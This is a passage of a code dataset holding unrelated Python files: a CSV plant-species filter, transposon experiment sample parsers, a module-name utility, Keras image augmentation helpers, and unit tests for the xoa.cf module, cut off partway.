Only accepts one argument\r\nparser.add_argument(\"-x\", \"--exclude\", action=\"extend\", nargs=\"+\", type=str, metavar=\"TAXON\", help=\"taxa to exclude\") # Doesn't have a limit on taxon excludes, they will be iterated anyway\r\n\r\nargs = parser.parse_args() # Parses with sys.argv by default, which is fine\r\n\r\nif bool(args.exclude):\r\n # Excludes are passed\r\n for taxon in args.exclude:\r\n # Supports extra arguments, comma separation, or a combination of the two\r\n # Removes leading and trailing whitespace, which makes comma separation more flexible\r\n exclude_list += [x.strip() for x in str(taxon).split(\",\")]\r\nelse:\r\n # No excludes passed, ask user\r\n raw_exclude = str(input(\"What, if any, taxa (genus or species) should be excluded from the filtered list? Leave blank if none. (e.g. 
> Genus1 Species1, Genus2, [...])\\n[list] > \"))\r\n    if raw_exclude.replace(\" \", \"\") != \"\":\r\n        # Almost the same as what is done above, except with only one str\r\n        exclude_list += [x.strip() for x in raw_exclude.split(\",\")]\r\n\r\n# Remove useless strings created during comma separation (usually not needed)\r\nexclude_list = [x for x in exclude_list if x != \"\"]\r\n\r\n# NOTE: It's not a big deal if a taxon is misspelled, it just won't filter anything; the user will be notified of this at the end.\r\n\r\n# We can check whether the argument is passed by converting it to bool; arguments are a list when passed, so any string inside makes it True\r\nif bool(args.source):\r\n    # Source passed in command line\r\n    source_path = args.source[0]\r\nelse:\r\n    # Source not passed, request from user\r\n    source_path = str(input(\"What is the file path of the source CSV spreadsheet? (If file is not located in the same directory as this program, use the full path.)\\n[file path] > \"))\r\n\r\nif bool(args.target):\r\n    # Target passed in command line\r\n    target_path = args.target[0]\r\nelse:\r\n    # Target not passed, request from user\r\n    target_path = str(input(\"What is the file path of the target CSV spreadsheet? (The CSV output document will be created at the target path; enter filename only to put it in this folder.)\\n[file path] > \"))\r\n\r\n# Check the program inputs before utilizing them\r\nif source_path.replace(\" \", \"\") == \"\":\r\n    # Source path is empty/whitespace (should only occur when using input())\r\n    raise ValueError(\"Source file path cannot be empty.\")\r\nif target_path.replace(\" \", \"\") == \"\":\r\n    # Target path is empty/whitespace (same as above)\r\n    raise ValueError(\"Target file path cannot be empty.\")\r\nif not os.path.isfile(source_path):\r\n    # Source path is not a file or doesn't exist (only calls os.path.isfile(), meaning the path to a folder would raise this as well)\r\n    raise FileNotFoundError(\"The document at the source path could not be found. (This could also mean the path led to a folder.)\")\r\nif os.path.isfile(target_path):\r\n    # Target path points to an existing file, ask user before overwrite (doesn't matter if there is a folder with the same name, though)\r\n    if str(input(f\"A file was detected at the target path '{target_path}'. Running this program will overwrite the file at this path. Proceed anyway?\\n[y/n] > \")).lower() in (\"y\", \"yes\"):\r\n        print(\"--> Target file will be overwritten after filtering is complete. Pressing Ctrl+C (Windows/Linux) or \\u2318+. (Mac) to halt the program during the filtering process can prevent this.\")\r\n    else:\r\n        cancel = True\r\n        print(\"--> Operation skipped.\")\r\n        # The other errors should probably exit the program, but this one can just pass without processing the file if this is being run externally\r\n\r\nif not cancel:\r\n    #print(f\"finish program with source '{source_path}', target '{target_path}' and excluding {exclude_list}\")\r\n    print(\"Gathering data from source file...\")\r\n    csv_data_raw = read_csv(source_path) # Read and group the data from source CSV file\r\n    print(\"Filtering species... (Species will appear below; this may take a while!)\")\r\n    csv_data_filtered = filter_woody_plants(csv_data_raw, exclude_list) # Analyze and filter data\r\n    print(\"Writing to target file...\")\r\n    export_csv(target_path, csv_data_filtered) # Save to target CSV file (overwrites file if already present)\r\n    print(\"Done. 
If you are concerned about accuracy, be sure to check the output manually for false positives.\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476096648","text":"import re\nfrom transposon.parser.registry import parser_factory\nfrom transposon.parser.experiment import ExperimentParser\nfrom transposon.rc import GROUP_TO_TREATMENTGROUP\n\n\n@parser_factory.register(['AA184', 'AA209', 'AA238', 'AA224'])\nclass TMGTIDParser1(ExperimentParser):\n\n def _skip(self, row):\n sname = self._sname(row)\n return \"Ink4aARF-24376-MA-XTM\" in sname\n\n def PbType(self, row):\n sname = self._sname(row)\n pos = sname.find('ATP')\n return \"ATP{}\".format(sname[pos+3])\n\n def StudyId(self, row):\n sname = self._sname(row)\n p = r'ATP[1|2]-(\\d+)-'\n match = re.search(p, sname)\n return match.group(1)\n\n def GeneticBackground(self, row):\n sname = self._sname(row)\n p = r'(arf|ink4aarf|brafv600e)'\n matches = re.findall(p, sname.lower())\n if len(matches) == 0:\n return \"WT\"\n if len(matches) > 1:\n raise ValueError('More than one background for {}'\n .format(sname))\n group = matches[0]\n if group == 'arf':\n return 'ARFKO'\n if group == 'ink4aarf':\n return 'Ink4aARFKO'\n if group == 'brafv600e':\n return 'BrafV600E'\n raise ValueError(\"Invalid genetic background {} for {}\"\n .format(group, sname))\n\n def Compound(self, row):\n return 'none'\n\n def TreatmentDosage(self, row):\n return '-'\n\n def TreatmentGroup(self, row):\n if self.PassageNumber(row) >= 0:\n return 'spontaneous_passage'\n tokens = self._tokenize(row, '-')\n group = tokens[-1].lower()\n return GROUP_TO_TREATMENTGROUP[group]\n\n\n@parser_factory.register(['AA257'])\nclass TMGTIDParser2(ExperimentParser):\n \"\"\"\n Specific parser for experiments which contain T-cells. 
We apply\n    a special parser for T-cell samples but revert to TMGTIDParser1 for all\n    other samples.\n    \"\"\"\n\n    def __init__(self, experiment_id):\n        super(TMGTIDParser2, self).__init__(experiment_id)\n        self.invivo_parser = TMGTIDParser1(experiment_id)\n\n    def SampleName(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.SampleName(row)\n        sname = self._sname(row)\n        p = r'[3|5]_(SW946-CD8\\+Day-\\d+-Spleen-cell|SW946-CD8\\+Day-\\d+)'\n        match = re.search(p, sname).group(1)\n        return \"{}_{}\".format(match, self.PbAnnot(row))\n\n    def _is_t_cell(self, row):\n        sname = self._sname(row)\n        return 'CD8' in sname or 'cells' in sname\n\n    def PbType(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.PbType(row)\n        return \"ATP2\"\n\n    def Tumor(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.Tumor(row)\n        return '-'\n\n    def Barcode(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.Barcode(row)\n        return '-'\n\n    def StudyId(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.StudyId(row)\n        return '-'\n\n    def GeneticBackground(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.GeneticBackground(row)\n        return 'WT'\n\n    def Compound(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.Compound(row)\n        return 'none'\n\n    def TreatmentDosage(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.TreatmentDosage(row)\n        return '-'\n\n    def TreatmentGroup(self, row):\n        if not self._is_t_cell(row):\n            return self.invivo_parser.TreatmentGroup(row)\n        return 'invitro'\n\n\n@parser_factory.register(['AA292', 'AA269', 'AA324'])\nclass TMGTIDParser3(ExperimentParser):\n    \"\"\"\n    Parse a mix of invitro and invivo samples.\n    invivo samples are treated with HDM201.\n    \"\"\"\n\n    def _invitro(self, row):\n        sname = self._sname(row)\n        return 'spleen' in sname and 'cell' in sname\n\n    def SampleName(self, row):\n        if self._invitro(row):\n            sname = self._sname(row)\n            p = r'ATP[1|2]-(\\S+)'\n            match = re.search(p, sname).group(1)\n            return '{}_{}'.format(match, self.PbAnnot(row))\n        return super(TMGTIDParser3, self).SampleName(row)\n\n    def PbType(self, row):\n        sname = self._sname(row)\n        pos = sname.find('ATP')\n        return \"ATP{}\".format(sname[pos+3])\n\n    def StudyId(self, row):\n        if self._invitro(row):\n            return '-'\n        sname = self._sname(row)\n        p = r'ATP[1|2]-(\\d+)-'\n        match = re.search(p, sname)\n        return match.group(1)\n\n    def Tumor(self, row):\n        if self._invitro(row):\n            return '-'\n        return super(TMGTIDParser3, self).Tumor(row)\n\n    def Barcode(self, row):\n        if self._invitro(row):\n            return '-'\n        return super(TMGTIDParser3, self).Barcode(row)\n\n    def GeneticBackground(self, row):\n        if self._invitro(row):\n            return \"WT\"\n        sname = self._sname(row)\n        p = r'(arf|ink4aarf|braf)'\n        matches = re.findall(p, sname.lower())\n        if len(matches) == 0:\n            return \"WT\"\n        if len(matches) > 1:\n            raise ValueError('More than one background for {}'\n                             .format(sname))\n        group = matches[0]\n        if group == 'arf':\n            return 'ARFKO'\n        if group == 'ink4aarf':\n            return 'Ink4aARFKO'\n        if group == 'braf':\n            return 'BrafV600E'\n        raise ValueError(\"Invalid genetic background {} for {}\"\n                         .format(group, sname))\n\n    def _treatgroup(self, row):\n        p = r'(-DR-|-DRins-|-DRsens-|-Veh-)'\n        sname = self._sname(row)\n        matches = re.findall(p, sname)\n        if len(matches) == 0:\n            return None\n        if len(matches) != 1:\n            raise ValueError(\"Invalid treatment group for {}\"\n                             .format(sname))\n        return matches[0].replace('-', '').lower()\n\n    def Compound(self, 
row):\n        if self._invitro(row):\n            return \"none\"\n        treat_group = self._treatgroup(row)\n        if treat_group is None:\n            return \"none\"\n        if treat_group == 'veh':\n            return 'Vehicule'\n        sname = self._sname(row)\n        p = r'(HDM201|ABT263|ABT199)'\n        matches = re.findall(p, sname)\n        if len(matches) == 0:\n            raise ValueError(\"Could not match compound for {}\"\n                             .format(sname))\n        compound = '+'.join(matches)\n        return compound\n\n    def TreatmentDosage(self, row):\n        if self._invitro(row):\n            return \"-\"\n        compounds = self.Compound(row)\n        if compounds == \"none\":\n            return \"-\"\n        sname = self._sname(row)\n        compounds = compounds.split('+')\n        doses = []\n        for cmp in compounds:\n            pos = sname.find(cmp) + len(cmp) + 1\n            s = sname[pos:]\n            t = s.split('-')\n            doses.append(t[0])\n        return '+'.join(doses)\n\n    def TreatmentGroup(self, row):\n        if self._invitro(row):\n            return \"invitro\"\n        treat_group = self._treatgroup(row)\n        if treat_group is None:\n            if self.PassageNumber(row) >= 0:\n                return 'spontaneous_passage'\n            tokens = self._tokenize(row, '-')\n            group = tokens[-1].lower()\n            if group == 'ma':\n                group = tokens[-2].lower()\n                assert group == \"xtm\"\n            return GROUP_TO_TREATMENTGROUP[group]\n        # Treated sample, group is resistant or untreated\n        return GROUP_TO_TREATMENTGROUP[treat_group]\n","sub_path":".atom/recovery/tmgt_various-238f75.py","file_name":"tmgt_various-238f75.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"454427425","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nModule Docstring\r\n\"\"\"\r\n\r\n__author__ = \"Chris Advena\"\r\n__version__ = \"0.0.1\"\r\n__license__ = \"MIT\"\r\n\r\nimport sys\r\nfrom inspect import stack\r\nfrom os.path import basename, splitext\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Utilities\r\n# ------------------------------------------------------------------------------\r\n\r\ndef get_mod_name():\r\n    \"\"\"\r\n\r\n    :return: the name of this module as extracted from the filename.\r\n    \"\"\"\r\n    try:\r\n        mod_filename = sys._getframe(0).f_globals['__file__']\r\n    except Exception:\r\n        '''\r\n        According to \r\n        https://stackoverflow.com/questions/1095543/get-name-of-calling-functions-module-in-python,\r\n        'the inspect.stack code FAILS after compile to exe using pyinstaller, \r\n        but using sys._current_frames WORKS FINE.' 
So, I elected to use the \r\n        try sys._getframe() function before using inspect.stack, as shown in the\r\n        code here:\r\n        '''\r\n        caller_frame = stack()[1]\r\n        mod_filename = caller_frame.filename\r\n\r\n    caller_base_name = basename(mod_filename)\r\n    return splitext(caller_base_name)[0]\r\n\r\n\r\ndef get_caller_mod_name():\r\n    \"\"\"\r\n\r\n    :return: name of the module 1 level up in the stack as extracted from the\r\n    filename.\r\n    \"\"\"\r\n    try:\r\n        caller_frame = sys._getframe(1)\r\n        caller_filename = caller_frame.f_globals['__file__']\r\n    except Exception:\r\n        # see notes in get_mod_name(), above.\r\n        caller_frame = stack()[1]\r\n        caller_filename = caller_frame.filename\r\n\r\n    caller_base_name = basename(caller_filename)\r\n    return splitext(caller_base_name)[0]\r\n\r\n","sub_path":".github/workflows/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"446573795","text":"'''\r\nAugmentImages.py\r\nElliot Trapp\r\n18/12/3\r\n\r\nUtilities for augmenting image training data to create dynamic training data.\r\n'''\r\n\r\nimport numpy as np\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\ndef GetTrainGenerator(load_dir, batch_size=32, target_size=(150,150), validation_split=0.0):\r\n\r\n    # this is the augmentation configuration we will use for training\r\n    train_datagen = ImageDataGenerator(\r\n        rescale=1./255,\r\n        shear_range=0.2,\r\n        zoom_range=0.2,\r\n        horizontal_flip=True,\r\n        validation_split=validation_split,\r\n        #preprocessing_function=preprocess_input\r\n        )\r\n\r\n    # this is a generator that will read pictures found in\r\n    # subfolders of 'data/train', and indefinitely generate\r\n    # batches of augmented image data\r\n\r\n    train_generator = train_datagen.flow_from_directory(\r\n        directory=load_dir,  # this is the target directory\r\n        target_size=target_size,  # all images will be resized to target_size\r\n        batch_size=batch_size,\r\n        class_mode='categorical',\r\n        subset='training')  # class_mode='categorical' yields one-hot labels\r\n\r\n    return train_generator\r\n\r\ndef GetTestGenerator(load_dir, batch_size=32, target_size=(150,150), validation_split=0.0):\r\n\r\n    # this is the augmentation configuration we will use for testing:\r\n    # only rescaling\r\n    test_datagen = ImageDataGenerator(rescale=1./255,\r\n                                      validation_split=validation_split,\r\n                                      # preprocessing_function=preprocess_input\r\n                                      )\r\n\r\n    # this is a similar generator, for validation data\r\n    test_generator = test_datagen.flow_from_directory(\r\n        directory=load_dir,\r\n        target_size=target_size,\r\n        batch_size=batch_size,\r\n        class_mode='categorical',\r\n        subset='validation')\r\n\r\n    return test_generator","sub_path":"AugmentImages.py","file_name":"AugmentImages.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"196922722","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nTest the :mod:`xoa.cf` module\n\"\"\"\n\n# from unittest.mock import Mock\nimport warnings\nimport pytest\n\nimport numpy as np\nimport xarray as xr\n\nimport xoa\nfrom xoa import cf\n\n\n@pytest.mark.parametrize(\n    \"attr,value,expected\",\n    [\n        (\"standard_name\", \"my_var_at_t_location\", (\"my_var\", \"t\")),\n        (\"standard_name\", \"my_var\", (\"my_var\", None)),\n        (\"long_name\", \"My var at T location\", (\"My var\", \"t\")),\n        (\"name\", \"myvar_t\", (\"myvar\", 
\"t\")),\n ],\n)\ndef test_cf_sglocator_parse_attr(attr, value, expected):\n assert cf.SGLocator().parse_attr(attr, value) == expected\n\n\n@pytest.mark.parametrize(\n \"attr,value,expected\",\n [\n (\"standard_name\", \"my_var_at_t_location\", (\"my_var_at_t_location\", None)),\n (\"standard_name\", \"my_var_at_u_location\", (\"my_var\", \"u\")),\n (\"long_name\", \"My var at RHO location\", (\"My var\", \"rho\")),\n (\"long_name\", \"My var at rho location\", (\"My var\", \"rho\")),\n (\"name\", \"myvarrho\", (\"myvar\", \"rho\")),\n ],\n)\ndef test_cf_sglocator_parse_attr_with_valid_locations(attr, value, expected):\n assert (\n cf.SGLocator(valid_locations=['u', 'rho'], name_format=\"{root}{loc}\",).parse_attr(\n attr, value\n )\n == expected\n )\n\n\n@pytest.mark.parametrize(\n \"name,standard_name,long_name,loc\",\n [\n (\"u_t\", None, None, \"t\"),\n (None, \"u_at_t_location\", None, \"t\"),\n (None, None, \"U at T location\", \"t\"),\n (\"u_t\", \"_at_t_location\", \"U at T location\", \"t\"),\n (\"u\", \"u_at_t_location\", None, \"t\"),\n (\"u\", \"u\", \"U\", None),\n ],\n)\ndef test_cf_sglocator_get_loc_from_da(name, standard_name, long_name, loc):\n\n da = xr.DataArray(0)\n if name:\n da.name = name\n if standard_name:\n da.attrs[\"standard_name\"] = standard_name\n if long_name:\n da.attrs[\"long_name\"] = long_name\n\n parsed_loc = cf.SGLocator().get_loc_from_da(da)\n assert parsed_loc == loc\n\n\n@pytest.mark.parametrize(\n \"name,standard_name,long_name\",\n [\n (\"u_t\", \"u_at_u_location\", None),\n (None, \"u_at_t_location\", \"U at U location\"),\n (\"u_u\", None, \"U at T location\"),\n (\"u_u\", \"u_at_w_location\", \"U at T location\"),\n ],\n)\ndef test_cf_sglocator_get_loc_from_da_error(name, standard_name, long_name):\n\n da = xr.DataArray(0)\n if name:\n da.name = name\n if standard_name:\n da.attrs[\"standard_name\"] = standard_name\n if long_name:\n da.attrs[\"long_name\"] = long_name\n\n with pytest.raises(cf.XoaCFError):\n cf.SGLocator().get_loc_from_da(da, errors=\"raise\")\n\n cf.SGLocator().get_loc_from_da(da, errors=\"ignore\")\n\n\n@pytest.mark.parametrize(\n \"attr,root,loc,expected\",\n [\n (\"standard_name\", \"my_var\", \"t\", True),\n (\"standard_name\", \"my_var2\", \"t\", False),\n (\"standard_name\", \"my_var\", \"x\", False),\n (\"standard_name\", \"my_var\", None, True),\n (\"standard_name\", \"my_var\", \"xtu\", True),\n (\"long_name\", \"My var\", \"t\", True),\n (\"long_name\", \"My var\", \"x\", False),\n (\"name\", \"myvar\", \"t\", True),\n (\"name\", \"myvar\", \"x\", False),\n ],\n)\ndef test_cf_sglocator_match_attr(attr, root, loc, expected):\n value = dict(\n standard_name=\"my_var_at_t_location\", long_name=\"My var at T location\", name=\"myvar_t\",\n )[attr]\n assert cf.SGLocator().match_attr(attr, value, root, loc) is expected\n\n\n@pytest.mark.parametrize(\n \"attr,root,loc,expected\",\n [\n (\"standard_name\", \"my_var\", \"t\", \"my_var_at_t_location\"),\n (\"standard_name\", \"my_var\", \"\", \"my_var\"),\n (\"long_name\", \"My var\", \"t\", \"My var at T location\"),\n (\"name\", \"myvar\", \"t\", \"myvar_t\"),\n ],\n)\ndef test_cf_sglocator_format_attr(attr, root, loc, expected):\n assert cf.SGLocator().format_attr(attr, root, loc) == expected\n\n\ndef test_cf_sglocator_format_attr_valid_locations():\n with pytest.raises(cf.XoaCFError) as excinfo:\n cf.SGLocator(valid_locations=\"x\").format_attr(\"name\", \"banana\", \"y\")\n assert str(excinfo.value) == (\n 'Location \"y\" is not recognised by the currents '\n 
'specifications. Registered locations are: x'\n )\n\n\ndef test_cf_sglocator_format_attrs_no_loc():\n attrs = {\n \"name\": \"u_u\",\n \"standard_name\": \"banana_at_t_location\",\n \"long_name\": \"Banana at T location\",\n \"int_attr\": 10,\n \"str_attr\": \"good\",\n }\n\n fmt_attrs = cf.SGLocator().format_attrs(attrs, loc='')\n assert fmt_attrs[\"name\"] == \"u_u\"\n assert fmt_attrs[\"standard_name\"] == \"banana\"\n assert fmt_attrs[\"long_name\"] == \"Banana\"\n for attr in (\"int_attr\", \"str_attr\"):\n assert fmt_attrs[attr] == attrs[attr]\n\n\ndef test_cf_sglocator_format_attrs_with_loc():\n attrs = {\n \"name\": \"u_u\",\n \"standard_name\": \"banana_at_t_location\",\n \"long_name\": \"Banana\",\n \"int_attr\": 10,\n \"str_attr\": \"good\",\n }\n\n fmt_attrs = cf.SGLocator().format_attrs(attrs, loc=\"f\")\n assert fmt_attrs[\"name\"] == \"u_u\"\n assert fmt_attrs[\"standard_name\"] == \"banana_at_f_location\"\n assert fmt_attrs[\"long_name\"] == \"Banana at F location\"\n for attr in (\"int_attr\", \"str_attr\"):\n assert fmt_attrs[attr] == attrs[attr]\n\n\n@pytest.mark.parametrize(\n \"value0, value1, loc, value\",\n [\n (\"sst\", None, \"t\", \"sst_t\"),\n (None, \"sst\", \"t\", \"sst_t\"),\n (\"sst\", \"sss\", \"t\", \"sss_t\"),\n (\"sst_x\", \"sss_y\", \"t\", \"sss_t\"),\n (\"sst_t\", None, None, \"sst_t\"),\n (None, \"sst_t\", None, \"sst_t\"),\n (\"sst_x\", \"sss_y\", None, \"sss_y\"),\n (\"sst_x\", \"sss\", None, \"sss_x\"),\n (\"sst\", \"sss_y\", None, \"sss_y\"),\n ],\n)\ndef test_cf_sglocator_merge_attr(value0, value1, loc, value):\n out = cf.SGLocator().merge_attr(\"name\", value0, value1, loc)\n assert out == value\n\n\n@pytest.mark.parametrize(\n \"isn, psn, osn, loc, replace\",\n [\n (\"sst\", None, \"sst\", None, False),\n (None, \"sst\", \"sst\", None, False),\n (\"sst\", \"temp\", \"sst\", None, False),\n (\"sst\", \"temp\", \"temp\", None, True),\n (\"sst_at_t_location\", \"temp_at_u_location\", \"sst_at_t_location\", None, False),\n (\"sst_at_t_location\", \"temp_at_u_location\", \"temp_at_u_location\", None, True),\n (\"sst\", \"temp\", \"sst_at_u_location\", \"u\", False),\n (\"sst\", \"temp\", \"temp_at_u_location\", \"u\", True),\n (\"sst_at_t_location\", \"temp_at_x_location\", \"sst_at_u_location\", \"u\", False),\n (\"sst_at_t_location\", \"temp_at_x_location\", \"temp_at_u_location\", \"u\", True),\n ],\n)\ndef test_cf_sglocator_patch_attrs(isn, psn, osn, loc, replace):\n\n iattrs = {\"units\": \"m\", \"color\": \"blue\"}\n patch = {\"cmap\": \"viridis\", \"mylist\": [1, 2], \"units\": \"cm\"}\n if isn:\n iattrs[\"standard_name\"] = isn\n if psn:\n patch[\"standard_name\"] = psn\n\n oattrs = cf.SGLocator().patch_attrs(iattrs, patch, loc=loc, replace=replace)\n\n assert oattrs[\"units\"] == (\"cm\" if replace else \"m\")\n assert oattrs[\"color\"] == \"blue\"\n assert oattrs[\"cmap\"] == \"viridis\"\n assert oattrs[\"mylist\"] == [1, 2]\n\n assert oattrs.get(\"standard_name\") == osn\n\n\n@pytest.mark.parametrize(\n \"floc,fname,fattrs,out_name,out_standard_name,replace_attrs\",\n [\n # (\"p\", None, None, \"banana_p\", \"banana_at_p_location\", False),\n # (None, None, None, \"banana_t\", \"banana\", False),\n # (\"p\", \"sst\", {\"standard_name\": \"potatoe\"}, \"sst_p\", \"banana_at_p_location\", False),\n # (\"p\", \"sst\", {\"standard_name\": \"potatoe\"}, \"sst_p\", \"potatoe_at_p_location\", True),\n # (\n # 'x',\n # \"sst\",\n # {\"standard_name\": [\"potatoe\", \"banana\"]},\n # \"sst_x\",\n # \"banana_at_x_location\",\n # True,\n # ),\n 
(None, \"sst_q\", {\"standard_name\": [\"potatoe\"]}, \"sst_q\", \"potatoe_at_q_location\", True),\n # (None, \"sst\", {\"standard_name\": [\"potatoe\"]}, \"sst_t\", \"potatoe_at_t_location\", True),\n ],\n)\ndef test_cf_sglocator_format_dataarray(\n floc, fname, fattrs, out_name, out_standard_name, replace_attrs\n):\n\n lon = xr.DataArray(range(5), dims=\"lon\")\n banana = xr.DataArray(\n lon + 20,\n dims=\"lon\",\n coords=[lon],\n name=\"banana_t\",\n attrs={\"standard_name\": \"banana\", \"taste\": \"good\"},\n )\n banana_fmt = cf.SGLocator().format_dataarray(\n banana, loc=floc, name=fname, attrs=fattrs, replace_attrs=replace_attrs\n )\n assert banana_fmt.name == out_name\n assert banana_fmt.standard_name == out_standard_name\n assert banana_fmt.taste == \"good\"\n\n\ndef test_cf_sglocator_format_dataarray_no_copy_no_rename():\n banana = xr.DataArray(1, name=\"banana_t\", attrs={\"standard_name\": \"banana\"})\n banana_fmt = cf.SGLocator().format_dataarray(banana, \"p\", copy=False, rename=False)\n assert banana_fmt is banana\n assert banana_fmt.name == \"banana_t\"\n assert banana_fmt.standard_name == \"banana_at_p_location\"\n\n\n@pytest.mark.parametrize(\"cache\", [\"ignore\", \"write\", \"rw\", \"read\", \"ignore\", \"clean\", \"rw\"])\ndef test_cf_get_cfg_specs(cache):\n assert isinstance(cf.get_cf_specs(cache=cache), cf.CFSpecs)\n\n\ndef test_cf_get_cfg_specs_var():\n specs = cf.get_cf_specs().data_vars[\"temp\"]\n assert specs[\"alt_names\"][0] == \"temperature\"\n assert specs[\"attrs\"][\"standard_name\"][0] == \"sea_water_temperature\"\n assert specs[\"cmap\"] == \"cmo.thermal\"\n new_specs = cf.get_cf_specs()[\"temp\"]\n assert new_specs is specs\n\n\ndef test_cf_get_cfg_specs_var_inherit():\n specs = cf.get_cf_specs().data_vars[\"sst\"]\n assert specs[\"attrs\"][\"standard_name\"][0] == \"sea_surface_temperature\"\n assert specs[\"attrs\"][\"units\"][0] == \"degrees_celsius\"\n\n\ndef test_cf_get_cfg_specs_coord():\n specs = cf.get_cf_specs().coords[\"lon\"]\n assert specs[\"alt_names\"][0] == \"longitude\"\n assert \"longitude\" in specs[\"alt_names\"]\n new_specs = cf.get_cf_specs()[\"lon\"]\n assert new_specs is specs\n\n\ndef test_cf_get_cfg_specs_coord_inherit():\n specs = cf.get_cf_specs().coords[\"depth\"]\n assert specs[\"alt_names\"][0] == \"dep\"\n assert specs[\"attrs\"][\"long_name\"][0] == \"Depth\"\n\n\n@pytest.mark.parametrize(\n \"cfg,key,name\",\n [\n ({\"data_vars\": {\"temp\": {\"alt_names\": \"mytemp\"}}}, \"temp\", \"mytemp\"),\n (\"[data_vars]\\n[[sal]]\\nalt_names=mysal\", \"sal\", \"mysal\"),\n ],\n)\ndef test_cf_cfspecs_load_cfg(cfg, key, name):\n cfspecs = cf.get_cf_specs()\n cfspecs.load_cfg(cfg)\n assert name in cfspecs[\"data_vars\"][key][\"alt_names\"]\n\n\ndef test_cf_cfspecs_copy():\n cfspecs0 = cf.get_cf_specs()\n cfspecs1 = cfspecs0.copy()\n assert id(cfspecs0._dict) != id(cfspecs1._dict)\n assert sorted(list(cfspecs0._dict[\"data_vars\"])) == sorted(list(cfspecs1._dict[\"data_vars\"]))\n assert cfspecs0._dict[\"coords\"] == cfspecs1._dict[\"coords\"]\n assert cfspecs0._dict[\"data_vars\"][\"temp\"] == cfspecs1._dict[\"data_vars\"][\"temp\"]\n assert \"temp\" in cfspecs1[\"data_vars\"]\n assert \"temperature\" in cfspecs1[\"data_vars\"][\"temp\"][\"alt_names\"]\n\n\ndef test_cf_set_cf_specs():\n cf.reset_cache(disk=False)\n cfspecs = cf.get_cf_specs()\n cf.set_cf_specs(cfspecs)\n cf_cache = cf._get_cache_()\n assert cf_cache[\"current\"] is cfspecs\n assert cf.get_cf_specs() is cfspecs\n\n\ndef test_cf_set_cf_specs_context():\n cfspecs0 = 
cf.get_cf_specs()\n cfspecs1 = cf.CFSpecs({\"data_vars\": {\"temp\": {\"alt_names\": \"tempouille\"}}})\n assert cf.get_cf_specs() is cfspecs0\n with cf.set_cf_specs(cfspecs1) as cfspecs:\n assert cfspecs is cfspecs1\n assert cf.get_cf_specs() is cfspecs1\n assert cf.get_cf_specs() is cfspecs0\n\n\n@pytest.mark.parametrize(\"specialize,expected\", [(False, \"temp\"), (True, \"temperature\")])\ndef test_cf_cfspecs_get_name(specialize, expected):\n cfspecs = cf.CFSpecs({\"data_vars\": {\"temp\": {\"name\": \"temperature\"}}})\n assert cfspecs.data_vars.get_name(\"temp\", specialize=specialize) == expected\n\n\ndef test_cf_cfspecs_get_attrs():\n cfspecs = cf.get_cf_specs()\n attrs = cfspecs.data_vars.get_attrs(\"temp\", other=\"ok\")\n assert attrs[\"long_name\"] == \"Temperature\"\n assert attrs[\"other\"] == \"ok\"\n\n\ndef test_cf_cfspecs_get_loc_mapping():\n\n cf_dict0 = {\n \"sglocator\": {\"valid_locations\": [\"u\", \"v\"],},\n \"data_vars\": {\n \"u\": {\"loc\": \"u\", \"add_loc\": False, \"add_coords_loc\": {\"lon\": True, \"x\": True},},\n \"bathy\": {\"add_loc\": True},\n },\n }\n cf_specs0 = cf.CFSpecs(cf_dict0)\n\n ds0 = xr.Dataset(\n {\"u\": ((\"time\", \"y\", \"x\"), np.ones((1, 2, 3))), \"bathy\": ((\"y\", \"x\"), np.ones((2, 3)))},\n coords={\n \"lon\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n\n locations = cf_specs0.get_loc_mapping(ds0)\n expected = {'u': False, 'lon': 'u', 'x': 'u', 'bathy': 'u', 'lat': None}\n assert set(locations.items()) == set(expected.items())\n\n\n@pytest.mark.parametrize(\"cf_name\", [None, \"lon\"])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\",\n [\n (\"lon\", None),\n (\"xxx\", {\"standard_name\": \"longitude\"}),\n (\"xxx\", {\"standard_name\": \"longitude_at_t_location\"}),\n (\"xxx\", {\"units\": \"degree_east\"}),\n ],\n)\ndef test_cf_cfspecs_match_coord(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims=in_name, name=in_name, attrs=in_attrs)\n res = cf.get_cf_specs().match_coord(lon, cf_name)\n if cf_name is None:\n assert res == 'lon'\n else:\n assert res is True\n\n\n@pytest.mark.parametrize(\"cf_name\", [\"lon\", None])\n@pytest.mark.parametrize(\n \"in_name,in_attrs\",\n [\n (\"lon\", None),\n (\"xxx\", {\"standard_name\": \"longitude\"}),\n (\"xxx\", {\"standard_name\": \"longitude_at_t_location\"}),\n (\"xxx\", {\"units\": \"degree_east\"}),\n ],\n)\ndef test_cf_cfspecs_search_coord(cf_name, in_name, in_attrs):\n\n lon = xr.DataArray(range(5), dims=in_name, name=in_name, attrs=in_attrs)\n temp = xr.DataArray(range(20, 25), dims=in_name, coords={in_name: lon}, name='temp')\n res = cf.get_cf_specs().search_coord(temp, cf_name, get=\"cf_name\")\n assert res == 'lon'\n\n\ndef test_cf_cfspecs_search_coord_with_stacking():\n\n ds = xr.Dataset(\n coords={\n \"lon\": (\"lon\", 